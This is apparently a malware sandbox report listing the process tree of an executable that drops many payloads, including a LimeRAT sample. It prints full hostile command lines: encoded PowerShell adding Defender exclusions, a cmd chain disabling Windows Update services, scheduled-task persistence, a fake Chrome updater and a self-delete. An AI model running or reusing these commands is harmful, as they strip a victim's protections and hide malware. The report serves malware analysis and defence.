PID 4092 wrote to memory of 401400	4092	8.exe	93
PID 4092 wrote to memory of 401400	4092	8.exe	93
PID 4092 wrote to memory of 401400	4092	8.exe	93
PID 4956 wrote to memory of 31820	4956	7.exe	94
PID 4956 wrote to memory of 31820	4956	7.exe	94
PID 4956 wrote to memory of 31820	4956	7.exe	94
PID 4956 wrote to memory of 31820	4956	7.exe	94
PID 4956 wrote to memory of 31820	4956	7.exe	94
PID 5084 wrote to memory of 106732	5084	3.exe	95
PID 5084 wrote to memory of 106732	5084	3.exe	95
PID 5084 wrote to memory of 121072	5084	3.exe	96
PID 5084 wrote to memory of 121072	5084	3.exe	96
PID 249904 wrote to memory of 162764	249904	svchost.exe	97
PID 249904 wrote to memory of 162764	249904	svchost.exe	97
PID 4784 wrote to memory of 78368	4784	2.exe	100
PID 4784 wrote to memory of 78368	4784	2.exe	100
PID 4784 wrote to memory of 78368	4784	2.exe	100
PID 4784 wrote to memory of 78368	4784	2.exe	100

C:\Users\Admin\AppData\Local\Temp\a18193c95d0c31ab132d9bc2da884d7c.exe
"C:\Users\Admin\AppData\Local\Temp\a18193c95d0c31ab132d9bc2da884d7c.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2636
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAdABkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAZgB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAdQBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdABrACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2096
- C:\Users\Admin\AppData\Local\Temp\1.exe
  "C:\Users\Admin\AppData\Local\Temp\1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:4720
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "UpdateChromeDay" /tr '"C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe"' & exit
    3⤵
    PID:388896
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "UpdateChromeDay" /tr '"C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe"'
      4⤵
      Creates scheduled task(s)
      PID:389008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF8F6.tmp.bat""
    3⤵
    PID:388912
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:389088
  - - C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe
      "C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe"
      4⤵
      Executes dropped EXE
      PID:389304
- C:\Users\Admin\AppData\Local\Temp\2.exe
  "C:\Users\Admin\AppData\Local\Temp\2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4784
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:78368
- C:\Users\Admin\AppData\Local\Temp\6.exe
  "C:\Users\Admin\AppData\Local\Temp\6.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1520
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAYQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAGsAcwBsACMAPgA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:16032
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
    3⤵
    PID:378212
  - - C:\Windows\system32\sc.exe
      sc stop UsoSvc
      4⤵
      Launches sc.exe
      PID:31904
  - - C:\Windows\system32\sc.exe
      sc stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:379164
  - - C:\Windows\system32\sc.exe
      sc stop wuauserv
      4⤵
      Launches sc.exe
      PID:379280
  - - C:\Windows\system32\sc.exe
      sc stop bits
      4⤵
      Launches sc.exe
      PID:379492
  - - C:\Windows\system32\sc.exe
      sc stop dosvc
      4⤵
      Launches sc.exe
      PID:379608
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
      4⤵
      Modifies registry key
      PID:379732
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
      4⤵
      Modifies registry key
      PID:379804
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
      4⤵
      Modifies security service
      Modifies registry key
      PID:379972
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
      4⤵
      Modifies registry key
      PID:380044
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
      4⤵
      Modifies registry key
      PID:380100
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\WaaSMedicSvc.dll
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:380164
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:380280
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
      4⤵
      Modifies registry key
      PID:380984
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
      4⤵
      Modifies registry key
      PID:381012
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
      4⤵
      Modifies registry key
      PID:381060
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
      4⤵
      Modifies registry key
      PID:381040
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
      4⤵
      PID:381084
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
      4⤵
      PID:381104
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
      4⤵
      PID:381124
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
      4⤵
      PID:381144
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
      4⤵
      PID:381164
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
      4⤵
      PID:381184
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      4⤵
      PID:381204
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    3⤵
    PID:378492
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:379080
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:379188
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:31908
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:379424
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBIAEUAQQBZAGcAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBIAEEARwA4AEEAYgB3AEIAbgBBAEcAdwBBAFoAUQBCAGMAQQBFAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEYAdwBBAGQAUQBCAHcAQQBHAFEAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQB0AEEARgBZAEEAWgBRAEIAeQBBAEcASQBBAEkAQQBCAFMAQQBIAFUAQQBiAGcAQgBCAEEASABNAEEASQBBAEEAOABBAEMATQBBAGQAZwBCAHMAQQBHAFEAQQBjAFEAQQBqAEEARAA0AEEAIgAnACkAIAA8ACMAdQBzACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAcQBvAHMAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwBpAGkAbwBhACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAcQB1ACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwANgAuAGUAeABlACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGYAdAB6AGIAIwA+ADsAIABTAHQAYQByAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAPAAjAHMAZgAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnADsA"
    3⤵
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:379252
- C:\Users\Admin\AppData\Local\Temp\7.exe
  "C:\Users\Admin\AppData\Local\Temp\7.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4956
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:31820
- C:\Users\Admin\AppData\Local\Temp\9.exe
  "C:\Users\Admin\AppData\Local\Temp\9.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4272
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:175000
- C:\Users\Admin\AppData\Local\Temp\11.exe
  "C:\Users\Admin\AppData\Local\Temp\11.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4832
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:363068
  - - C:\Users\Admin\AppData\Local\Temp\start.exe
      "C:\Users\Admin\AppData\Local\Temp\start.exe"
      4⤵
      Executes dropped EXE
      PID:382288
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "" "Get-WmiObject Win32_PortConnector"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:32012
- C:\Users\Admin\AppData\Local\Temp\5.exe
  "C:\Users\Admin\AppData\Local\Temp\5.exe"
  2⤵
  - Executes dropped EXE
  PID:3428
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\Admin\AppData\Roaming\WindosCert.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:395720
- - C:\Users\Admin\AppData\Roaming\WindosCert.exe
    "C:\Users\Admin\AppData\Roaming\WindosCert.exe"
    3⤵
    - Executes dropped EXE
    PID:395884
- C:\Users\Admin\AppData\Local\Temp\3.exe
  "C:\Users\Admin\AppData\Local\Temp\3.exe"
  2⤵
  - Enumerates VirtualBox registry keys
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Looks for VirtualBox Guest Additions in registry
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:5084
- - C:\ProgramData\GeForce\Lib\COM Surrogate.exe
    "C:\ProgramData\GeForce\Lib\COM Surrogate.exe"
    3⤵
    - Enumerates VirtualBox registry keys
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Looks for VirtualBox Guest Additions in registry
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    PID:106732
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\3.exe >> NUL
    3⤵
    PID:121072
- C:\Users\Admin\AppData\Local\Temp\10.exe
  "C:\Users\Admin\AppData\Local\Temp\10.exe"
  2⤵
  - Executes dropped EXE
  PID:3672
- C:\Users\Admin\AppData\Local\Temp\8.exe
  "C:\Users\Admin\AppData\Local\Temp\8.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4092
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:401400
- C:\Users\Admin\AppData\Local\Temp\v0.7.exe
  "C:\Users\Admin\AppData\Local\Temp\v0.7.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4240
- - C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:103536
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:249904
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\8.1.7601.17587\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\8.1.7601.17587\svchost.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:162764
- - C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    3⤵
    - Executes dropped EXE
    PID:111776
- - C:\Users\Admin\AppData\Local\Temp\SLAYER Leecher v0.7 .exe
    "C:\Users\Admin\AppData\Local\Temp\SLAYER Leecher v0.7 .exe"
    3⤵
    - Executes dropped EXE
    PID:132760
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 132760 -s 932
      4⤵
      Program crash
      PID:227532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHEAYgAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAdgBsAGQAcQAjAD4A"
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:380504
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:381284
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAYQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAGsAcwBsACMAPgA="
    3⤵
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID:381348
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
    3⤵
    PID:384648
  - - C:\Windows\system32\sc.exe
      sc stop UsoSvc
      4⤵
      Launches sc.exe
      PID:385180
  - - C:\Windows\system32\sc.exe
      sc stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:385296
  - - C:\Windows\system32\sc.exe
      sc stop dosvc
      4⤵
      Launches sc.exe
      PID:385340
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
      4⤵
      Modifies registry key
      PID:385352
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
      4⤵
      Modifies registry key
      PID:385364
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
      4⤵
      Modifies registry key
      PID:385376
  - - C:\Windows\system32\sc.exe
      sc stop bits
      4⤵
      Launches sc.exe
      PID:385328
  - - C:\Windows\system32\sc.exe
      sc stop wuauserv
      4⤵
      Launches sc.exe
      PID:385312
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
      4⤵
      Modifies registry key
      PID:385428
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
      4⤵
      Modifies registry key
      PID:385492
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\WaaSMedicSvc.dll
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:385548
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:385564
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
      4⤵
      Modifies registry key
      PID:385612
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
      4⤵
      Modifies registry key
      PID:385716
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
      4⤵
      Modifies registry key
      PID:386356
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
      4⤵
      Modifies registry key
      PID:386560
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
      4⤵
      PID:386840
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
      4⤵
      PID:387080
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
      4⤵
      PID:387316
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
      4⤵
      PID:387712
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
      4⤵
      PID:387872
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
      4⤵
      PID:388048
  - - C:\Windows\system32\schtasks.exe
